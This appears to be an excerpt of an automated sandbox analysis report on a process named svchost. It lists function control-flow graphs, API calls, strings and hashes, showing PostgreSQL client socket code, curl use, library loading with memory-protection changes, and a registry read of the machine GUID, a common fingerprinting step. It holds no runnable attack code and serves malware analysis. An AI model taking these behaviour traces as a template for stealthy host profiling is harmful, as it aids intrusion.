            • Opcode Fuzzy Hash: 1ad9dc9591952d91a480d1a508270e3ff6dc2c1a2e41b9bdce3b2d942a2d5182
            • Instruction Fuzzy Hash: FBC1C237B28A4186EB12DF68D4812AC3771FB4AB98F109335EA1E977A5DF38E551C700
            Function 00007FFA2CEF3BC7 Relevance: 58.1, APIs: 22, Strings: 11, Instructions: 306networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 354 7ffa2cef3bc7-7ffa2cef3bd4 355 7ffa2cef3bd6-7ffa2cef3bdb 354->355 356 7ffa2cef3be5-7ffa2cef3c66 354->356 355->356 357 7ffa2cef3c68-7ffa2cef3c6e free 356->357 358 7ffa2cef3c75-7ffa2cef3c80 356->358 357->358 359 7ffa2cef3c94-7ffa2cef3c98 358->359 360 7ffa2cef3c82-7ffa2cef3c92 358->360 362 7ffa2cef3ce3 359->362 363 7ffa2cef3c9a-7ffa2cef3ca6 359->363 361 7ffa2cef3caa-7ffa2cef3cc2 call 7ffa2cf14cf0 360->361 361->362 369 7ffa2cef3cc4-7ffa2cef3ccb 361->369 364 7ffa2cef3cea-7ffa2cef3d04 socket 362->364 363->361 367 7ffa2cef3d06-7ffa2cef3d1a WSAGetLastError 364->367 368 7ffa2cef3d6b-7ffa2cef3d75 call 7ffa2cef90d0 364->368 370 7ffa2cef3d20-7ffa2cef3d2e 367->370 371 7ffa2cef3e0a-7ffa2cef3e14 367->371 373 7ffa2cef3d7a-7ffa2cef3d7d 368->373 369->364 374 7ffa2cef3ccd-7ffa2cef3ce1 _strdup 369->374 370->371 375 7ffa2cef3d34-7ffa2cef4db8 call 7ffa2cef90d0 call 7ffa2cf0c450 call 7ffa2cf02d70 370->375 379 7ffa2cef3e20-7ffa2cef3e23 371->379 376 7ffa2cef3dd1-7ffa2cef3ddf call 7ffa2cf13980 373->376 377 7ffa2cef3d7f-7ffa2cef3dac setsockopt 373->377 374->364 403 7ffa2cef4dba-7ffa2cef4e02 call 7ffa2cf16230 375->403 376->379 397 7ffa2cef3de1-7ffa2cef3df8 WSAGetLastError call 7ffa2cf0c450 376->397 377->376 382 7ffa2cef3dae-7ffa2cef3dcf WSAGetLastError call 7ffa2cf0c450 377->382 380 7ffa2cef3e29-7ffa2cef3e30 379->380 381 7ffa2cef404b-7ffa2cef406e connect 379->381 385 7ffa2cef3e32-7ffa2cef3e4b strtol 380->385 386 7ffa2cef3e7a-7ffa2cef3e92 380->386 390 7ffa2cef40c9-7ffa2cef40d3 381->390 391 7ffa2cef4070-7ffa2cef407b WSAGetLastError 381->391 402 7ffa2cef3dff-7ffa2cef3e05 call 7ffa2cf02d70 382->402 392 7ffa2cef3e72-7ffa2cef3e74 385->392 393 7ffa2cef3e4d-7ffa2cef3e66 call 7ffa2cf02d70 385->393 395 7ffa2cef3e94-7ffa2cef3eba _errno strtol 386->395 396 7ffa2cef3f05-7ffa2cef3f0f 386->396 399 7ffa2cef48c9-7ffa2cef48d8 390->399 391->399 400 7ffa2cef4081-7ffa2cef408c WSAGetLastError 391->400 392->381 392->386 393->392 404 7ffa2cef3ec0-7ffa2cef3ec9 _errno 395->404 405 7ffa2cef3f8d-7ffa2cef3fa6 call 7ffa2cf02d70 395->405 409 7ffa2cef3f11-7ffa2cef3f27 call 7ffa2cefa920 396->409 410 7ffa2cef3f2e-7ffa2cef3f42 call 7ffa2cefafa0 396->410 397->402 399->403 400->399 408 7ffa2cef4092-7ffa2cef409d WSAGetLastError 400->408 402->371 404->405 415 7ffa2cef3ecf-7ffa2cef3ed9 404->415 430 7ffa2cef3f6b-7ffa2cef3f78 405->430 408->399 420 7ffa2cef40a3-7ffa2cef40bd WSAGetLastError call 7ffa2cef6990 408->420 429 7ffa2cef3f29 409->429 409->430 431 7ffa2cef3fa8-7ffa2cef3faf 410->431 432 7ffa2cef3f44-7ffa2cef3f66 WSAGetLastError call 7ffa2cf02d70 410->432 415->396 425 7ffa2cef3edb 415->425 420->390 434 7ffa2cef3ee0-7ffa2cef3ef0 isspace 425->434 429->410 437 7ffa2cef3f84-7ffa2cef3f87 430->437 438 7ffa2cef4048 431->438 439 7ffa2cef3fb5-7ffa2cef3fd8 _errno strtol 431->439 432->430 436 7ffa2cef3ef6-7ffa2cef3f03 434->436 434->437 436->396 436->434 437->396 437->405 438->381 440 7ffa2cef4019-7ffa2cef403c call 7ffa2cf02d70 439->440 441 7ffa2cef3fda-7ffa2cef3fe3 _errno 439->441 440->438 441->440 442 7ffa2cef3fe5-7ffa2cef3fef 441->442 442->381 444 7ffa2cef3ff1-7ffa2cef4001 isspace 442->444 446 7ffa2cef4014-7ffa2cef4017 444->446 447 7ffa2cef4003-7ffa2cef4010 444->447 446->381 446->440 447->444 448 7ffa2cef4012 447->448 448->381
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: ErrorLast_strdupfreesocket
            • String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
            • API String ID: 3112834638-675630034
            • Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
            • Instruction ID: e22de063a4e069d6af7e4073c677e0ce0ea59f7a2d0701d6a1f75426bc0e4960
            • Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
            • Instruction Fuzzy Hash: 77F17F62B08B8282F7518F25D8502F837A0FF46BA4F489135DE4E27695DF7DEA85C720
            Function 682814A0 Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 312stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 449 682814a0-682814c5 450 682814e2-682814f2 strcmp 449->450 451 682814c7 449->451 453 682814d0 450->453 454 682814f4-682814f7 450->454 452 682815e4-682815e7 451->452 456 68281709-6828170c 452->456 457 682815ed-682815f2 452->457 453->452 455 682814d6-682814dc 453->455 458 682814fd-68281504 454->458 459 682816d4-682816d7 454->459 455->450 455->452 463 682815c0-682815cf pthread_rwlock_unlock 456->463 464 68281712-68281717 456->464 460 682815f8-68281613 strlen malloc 457->460 461 68281782-68281785 457->461 465 6828150a-6828151b strcmp 458->465 466 682816f7-68281702 458->466 462 682816dd-682816e4 459->462 459->463 467 682817e8 460->467 468 68281619-68281623 memcpy 460->468 461->464 469 68281787-68281792 461->469 472 682816ea-682816f2 462->472 473 6828156e-68281575 462->473 477 68281822-68281840 abort 463->477 478 682815d5-682815e3 463->478 475 68281719-68281734 strlen malloc 464->475 476 68281797-6828179a 464->476 470 682816d0 465->470 471 68281521-68281532 strcmp 465->471 466->462 474 68281704 466->474 489 682817f0-682817f3 467->489 481 68281628-68281636 468->481 469->463 470->459 479 68281538-68281545 471->479 480 68281762-68281770 _strdup 471->480 484 682815b2-682815b4 472->484 487 68281586-68281594 _strdup 473->487 488 68281577-68281584 strcmp 473->488 474->463 490 6828173a-6828174c memcpy 475->490 491 6828181b-6828181e 475->491 482 6828179c-682817a3 476->482 483 682817a7-682817af 476->483 485 68281849-68281851 477->485 486 68281842-68281845 477->486 495 6828154f-6828155a 479->495 496 68281547-6828154a free 479->496 505 682816ca-682816cd 480->505 506 68281776 480->506 492 68281638-68281649 strcmp 481->492 493 6828164f-6828165a 481->493 482->483 483->463 484->463 503 682815b6-682815bd 484->503 498 68281852-68281861 pthread_rwlock_wrlock 486->498 499 68281847 486->499 501 6828159a-682815aa free 487->501 502 682817c0 487->502 488->487 500 682815ae 488->500 489->483 494 682817f5 489->494 490->481 504 68281752-6828175d 490->504 491->467 497 68281820 491->497 492->493 509 682817c7-682817d5 _strdup 492->509 507 682817fa 493->507 508 68281660-68281667 493->508 494->463 495->503 510 6828155c-68281568 495->510 496->495 497->483 511 68281881-682818a0 abort 498->511 512 68281863-68281880 call 682814a0 498->512 499->485 500->484 501->500 502->509 503->463 504->508 505->470 506->461 519 68281807-68281812 507->519 513 68281669-68281671 _strdup 508->513 514 6828167a-68281689 508->514 509->493 515 682817db-682817e6 free 509->515 510->472 510->473 517 682818a9-682818b1 511->517 518 682818a2-682818a5 511->518 513->519 520 68281677 513->520 521 6828168f-6828169d strcmp 514->521 522 682817b4-682817b7 514->522 515->467 515->489 524 682818b2-682818c1 pthread_rwlock_wrlock 518->524 525 682818a7 518->525 519->515 530 68281814-68281819 free 519->530 520->514 528 6828169f 521->528 529 682816b7-682816bd 521->529 522->502 526 682818e0-68281910 abort call 682849a0 524->526 527 682818c3-682818df call 682814a0 524->527 525->517 528->522 533 682816bf-682816c2 529->533 534 682816a4-682816b2 strcmp 529->534 530->515 533->505 534->533 536 682816b4 534->536 536->529
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
            • String ID: 8`)h$pq)h
            • API String ID: 1031399696-283867673
            • Opcode ID: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
            • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
            • Opcode Fuzzy Hash: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
            • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300
            Function 00007FFA2CEF3552 Relevance: 38.9, APIs: 8, Strings: 14, Instructions: 397stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 539 7ffa2cef3552-7ffa2cef355c call 7ffa2cf02370 542 7ffa2cef3562 539->542 543 7ffa2cef4dae-7ffa2cef4db8 539->543 545 7ffa2cef3568-7ffa2cef3575 542->545 546 7ffa2cef4ccd-7ffa2cef4cd2 542->546 547 7ffa2cef4dba-7ffa2cef4e02 call 7ffa2cf16230 543->547 548 7ffa2cef357a-7ffa2cef359d 545->548 546->547 553 7ffa2cef359f-7ffa2cef35ab 548->553 554 7ffa2cef35cc-7ffa2cef35d1 548->554 557 7ffa2cef35bf-7ffa2cef35c2 553->557 558 7ffa2cef35ad-7ffa2cef35bd 553->558 555 7ffa2cef35d7-7ffa2cef35e7 554->555 556 7ffa2cef3b13-7ffa2cef3b16 554->556 559 7ffa2cef35e9-7ffa2cef35f0 555->559 560 7ffa2cef360b-7ffa2cef361b 555->560 561 7ffa2cef3b18-7ffa2cef3b50 556->561 562 7ffa2cef3b52-7ffa2cef3b55 556->562 563 7ffa2cef35c5 557->563 558->563 559->543 564 7ffa2cef35f6-7ffa2cef35f8 559->564 566 7ffa2cef361d-7ffa2cef3623 free 560->566 567 7ffa2cef362a-7ffa2cef3646 560->567 565 7ffa2cef3b57-7ffa2cef3b97 call 7ffa2cef63c0 call 7ffa2cefae50 call 7ffa2cefe5f0 561->565 562->565 568 7ffa2cef3b9e-7ffa2cef3bac 562->568 563->554 564->543 569 7ffa2cef35fe-7ffa2cef3608 564->569 565->568 566->567 571 7ffa2cef3648-7ffa2cef3660 567->571 572 7ffa2cef3673-7ffa2cef367e 567->572 573 7ffa2cef3bb2-7ffa2cef3bc2 568->573 574 7ffa2cef4d8e-7ffa2cef4d9d call 7ffa2cf02d70 568->574 569->560 576 7ffa2cef3682-7ffa2cef3694 571->576 577 7ffa2cef3662-7ffa2cef3671 memset 571->577 572->576 579 7ffa2cef488a-7ffa2cef48a3 call 7ffa2cf02d70 573->579 574->543 582 7ffa2cef3749 576->582 583 7ffa2cef369a-7ffa2cef369d 576->583 577->576 579->543 586 7ffa2cef374f-7ffa2cef376e call 7ffa2cf11830 582->586 583->582 587 7ffa2cef36a3-7ffa2cef36c8 _errno strtol 583->587 597 7ffa2cef38b6-7ffa2cef38d1 call 7ffa2cf0e100 586->597 598 7ffa2cef3774-7ffa2cef3777 586->598 587->579 591 7ffa2cef36ce-7ffa2cef36d7 _errno 587->591 591->579 594 7ffa2cef36dd-7ffa2cef36e7 591->594 595 7ffa2cef36e9 594->595 596 7ffa2cef371c-7ffa2cef3725 594->596 599 7ffa2cef36f0-7ffa2cef3700 isspace 595->599 596->586 600 7ffa2cef3727-7ffa2cef3744 call 7ffa2cf02d70 596->600 616 7ffa2cef3ae7-7ffa2cef3b0e call 7ffa2cf148a0 call 7ffa2cf02d70 597->616 617 7ffa2cef38d7-7ffa2cef38df 597->617 602 7ffa2cef385c-7ffa2cef387e call 7ffa2cf0e100 598->602 603 7ffa2cef377d-7ffa2cef3780 598->603 604 7ffa2cef3702-7ffa2cef370f 599->604 605 7ffa2cef3713-7ffa2cef3716 599->605 600->548 619 7ffa2cef3880-7ffa2cef3888 602->619 620 7ffa2cef388a-7ffa2cef38b1 call 7ffa2cf148a0 call 7ffa2cf02d70 602->620 609 7ffa2cef3786-7ffa2cef37b8 call 7ffa2cf11830 603->609 610 7ffa2cef3852-7ffa2cef3857 603->610 604->599 613 7ffa2cef3711 604->613 605->579 605->596 626 7ffa2cef37c0-7ffa2cef37c7 609->626 612 7ffa2cef38e5-7ffa2cef38f6 610->612 621 7ffa2cef38f8-7ffa2cef38fb 612->621 622 7ffa2cef3911-7ffa2cef3929 calloc 612->622 613->596 616->548 617->612 617->616 619->612 619->620 620->548 624 7ffa2cef3900-7ffa2cef390f 621->624 627 7ffa2cef48a8-7ffa2cef48c4 call 7ffa2cf02d70 call 7ffa2cf0e290 622->627 628 7ffa2cef392f-7ffa2cef3939 622->628 624->622 624->624 626->626 631 7ffa2cef37c9-7ffa2cef37cd 626->631 627->543 632 7ffa2cef3998-7ffa2cef39ac call 7ffa2cf0e290 628->632 633 7ffa2cef393b-7ffa2cef393e 628->633 637 7ffa2cef37cf-7ffa2cef37f5 call 7ffa2cf02d70 631->637 638 7ffa2cef37fa-7ffa2cef3813 call 7ffa2cf0e100 631->638 650 7ffa2cef3ad2-7ffa2cef3ae5 632->650 651 7ffa2cef39b2-7ffa2cef39bd 632->651 639 7ffa2cef3940-7ffa2cef3996 memcpy 633->639 637->548 654 7ffa2cef3815-7ffa2cef381d 638->654 655 7ffa2cef3823-7ffa2cef384d call 7ffa2cf148a0 call 7ffa2cf02d70 638->655 639->632 639->639 650->561 651->650 653 7ffa2cef39c3-7ffa2cef39c8 651->653 656 7ffa2cef39d0-7ffa2cef3acc call 7ffa2cf0ea30 653->656 654->612 654->655 655->548 656->650
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
            • String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
            • API String ID: 3976168012-2457897468
            • Opcode ID: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
            • Instruction ID: e1682a9b2b754856040ff2509895812d07488e670828b22cf5c0e35b9fb0865f
            • Opcode Fuzzy Hash: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
            • Instruction Fuzzy Hash: D3129D22B08BC686E7118F25D9403F87760FB5ABA8F549231DE4E27696DF3DE685C310
            Function 00007FFA417EDC90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197registryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 835 7ffa417edc90-7ffa417edd20 call 7ffa417cacf0 RegOpenKeyExW 838 7ffa417edd26-7ffa417edd4e RegQueryValueExW 835->838 839 7ffa417edf4c-7ffa417edf6f call 7ffa418518b0 835->839 840 7ffa417edd54-7ffa417edd58 838->840 841 7ffa417edf41-7ffa417edf4b RegCloseKey 838->841 840->841 843 7ffa417edd5e-7ffa417edd64 840->843 841->839 843->841 845 7ffa417edd6a-7ffa417edd7c 843->845 846 7ffa417edde3-7ffa417ede13 RegQueryValueExW 845->846 847 7ffa417edd7e-7ffa417edd82 845->847 848 7ffa417ede66-7ffa417ede75 RegCloseKey 846->848 849 7ffa417ede15-7ffa417ede23 RegCloseKey 846->849 850 7ffa417edd89-7ffa417edd90 847->850 851 7ffa417edd84-7ffa417edd87 847->851 856 7ffa417edeb7-7ffa417edecc 848->856 857 7ffa417ede77-7ffa417ede8f 848->857 849->839 852 7ffa417ede29-7ffa417ede41 849->852 854 7ffa417edd92-7ffa417edd99 850->854 855 7ffa417eddbe-7ffa417eddc1 call 7ffa418518d8 850->855 853 7ffa417eddc6-7ffa417edddf call 7ffa41887af0 851->853 858 7ffa417ede43-7ffa417ede56 852->858 859 7ffa417ede5c-7ffa417ede61 call 7ffa418518d0 852->859 853->846 860 7ffa417edf70-7ffa417edf75 call 7ffa417c2c80 854->860 861 7ffa417edd9f-7ffa417eddaa call 7ffa418518d8 854->861 855->853 866 7ffa417edef7-7ffa417edeff call 7ffa417e6ce0 856->866 867 7ffa417edece-7ffa417eded5 856->867 862 7ffa417ede91-7ffa417edea4 857->862 863 7ffa417edeaa-7ffa417edeb2 call 7ffa418518d0 857->863 858->859 868 7ffa417edf76-7ffa417edf7b call 7ffa41866d18 858->868 859->839 860->868 861->868 887 7ffa417eddb0-7ffa417eddbc 861->887 862->863 862->868 863->839 886 7ffa417edf00-7ffa417edf07 866->886 875 7ffa417eded7 867->875 876 7ffa417ededa-7ffa417edef5 call 7ffa41887450 867->876 875->876 876->886 886->839 888 7ffa417edf09-7ffa417edf21 886->888 887->853 888->859 889 7ffa417edf27-7ffa417edf3a 888->889 889->868 890 7ffa417edf3c 889->890 890->859
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Close$QueryValue$Concurrency::cancel_current_taskOpen_invalid_parameter_noinfo_noreturn
            • String ID: MachineGuid$N/A$SOFTWARE\Microsoft\Cryptography
            • API String ID: 3643607239-238228221
            • Opcode ID: cbdda606dab6dd788f2b8d026cc23da2296bc16b614af3a288cc8aeaa51c27b2
            • Instruction ID: 5817c7bf608e28e4cc768bf71d23d2997c5e1515c788f0bc3560f6f13c7138d8
            • Opcode Fuzzy Hash: cbdda606dab6dd788f2b8d026cc23da2296bc16b614af3a288cc8aeaa51c27b2
            • Instruction Fuzzy Hash: F7819232F28B4585EB52EB65D444AAD23B0EB4A7A8F508231DA6D13BE5DF3CE4818704
            Function 00007FFA41873240 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            APIs
            • LoadLibraryW.KERNELBASE(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418732AD
            • GetLastError.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418732BF
            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA41873301
            • VirtualProtect.KERNEL32 ref: 00007FFA4187335D
            • VirtualProtect.KERNEL32 ref: 00007FFA4187338E
            • FreeLibrary.KERNEL32(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418733D2
            • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFA41873A72,?,?,?,00007FFA418739F5), ref: 00007FFA418733DE
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
            • API String ID: 983678269-1880043860
            • Opcode ID: ef1a0462dc7e1d20ffb31724c7bbfec7ef991d06205c39f90ae483373132d1d3
            • Instruction ID: 767530c000b968faa7a4c37d883e17b599cbe55e2851a51a35d84c2c7c881a2a
            • Opcode Fuzzy Hash: ef1a0462dc7e1d20ffb31724c7bbfec7ef991d06205c39f90ae483373132d1d3
            • Instruction Fuzzy Hash: 4751BD21B1CB4691EB27BB66A9402792394AF4ABB0F488735DE3D477E0EF3CF4458201
            Function 00007FFA417EA8F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 137COMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: curl_easy_setopt$curl_easy_cleanup$_invalid_parameter_noinfo_noreturncurl_easy_initcurl_easy_performcurl_easy_strerror
            • String ID: CURL could not be initialized.
            • API String ID: 2598017873-556012955
            • Opcode ID: ef258deae3e9c7c66bd8f4ce74365bd5f9745c1280b6d6a2ac57bc767532f796
            • Instruction ID: 0b4371f3ac27b406066c0338ec0accba9a7bbbade47749f714fc390e48aa6c34
            • Opcode Fuzzy Hash: ef258deae3e9c7c66bd8f4ce74365bd5f9745c1280b6d6a2ac57bc767532f796
            • Instruction Fuzzy Hash: 6851E962E0C78542EB03AB65A4013796360EF9ABE4F159330EE9D067B7EF6CE1818704
            Function 00007FFA2CEFA090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82networkCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1048 7ffa2cefa090-7ffa2cefa0b2 1049 7ffa2cefa0b4-7ffa2cefa0c6 WSAStartup 1048->1049 1050 7ffa2cefa0cf-7ffa2cefa0e8 WSASetLastError malloc 1048->1050 1051 7ffa2cefa0c8 1049->1051 1052 7ffa2cefa0ea-7ffa2cefa0ec 1049->1052 1050->1052 1053 7ffa2cefa0f1-7ffa2cefa1c9 memset malloc * 3 call 7ffa2cf0bca0 1050->1053 1051->1050 1054 7ffa2cefa236-7ffa2cefa24e call 7ffa2cf16230 1052->1054 1057 7ffa2cefa1ce-7ffa2cefa1e5 call 7ffa2cf0bca0 1053->1057 1061 7ffa2cefa219-7ffa2cefa221 call 7ffa2cef9330 1057->1061 1062 7ffa2cefa1e7-7ffa2cefa1ef 1057->1062 1067 7ffa2cefa223-7ffa2cefa22e 1061->1067 1062->1061 1063 7ffa2cefa1f1-7ffa2cefa1f9 1062->1063 1063->1061 1066 7ffa2cefa1fb-7ffa2cefa1fe 1063->1066 1066->1061 1068 7ffa2cefa200-7ffa2cefa208 1066->1068 1067->1054 1068->1061 1069 7ffa2cefa20a-7ffa2cefa20d 1068->1069 1069->1061 1070 7ffa2cefa20f-7ffa2cefa217 1069->1070 1070->1061 1070->1067
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2388529221.00007FFA2CEF1000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFA2CEF0000, based on PE: true
            • Associated: 0000002E.00000002.2388484418.00007FFA2CEF0000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390056945.00007FFA2CF3E000.00000004.00000001.01000000.00000017.sdmpDownload File
            • Associated: 0000002E.00000002.2390101505.00007FFA2CF3F000.00000002.00000001.01000000.00000017.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa2cef0000_svchost.jbxd
            Similarity
            • API ID: malloc$ErrorLastStartupmemset
            • String ID:
            • API String ID: 4264553866-3916222277
            • Opcode ID: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
            • Instruction ID: b3d2c82e594681af9aa1bc9de22aa2a1ecf0765155fef08e2a95c74b51a72310
            • Opcode Fuzzy Hash: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
            • Instruction Fuzzy Hash: C0415071B48BC186F7558F20E8583A923A4FB06B6CF088139CE4D2B3D9DFBD92458320
            Function 00007FFA4187A908 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
